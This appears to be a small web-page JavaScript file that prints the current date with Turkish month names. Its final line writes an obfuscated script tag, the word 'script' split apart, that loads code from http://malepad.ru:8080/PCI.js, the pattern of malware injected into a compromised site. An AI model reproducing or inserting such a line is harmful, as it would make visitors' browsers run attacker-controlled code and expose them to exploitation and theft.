

var months=new Array(13);
months[1]="Ocak";
months[2]="Subat";
months[3]="Mart";
months[4]="Nisan";
months[5]="Mayis";
months[6]="Haziran";
months[7]="Temmuz";
months[8]="Agustos";
months[9]="Eylul";
months[10]="Ekim";
months[11]="Kasim";
months[12]="Aralik";
var time=new Date();
var lmonth=months[time.getMonth() + 1];
var date=time.getDate();
var year=time.getYear();
if (year < 2000)
year = year + 1900;
document.write(date + " ");
document.write(lmonth + " " + year);



document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/PCI.js"></scr'+'ipt>');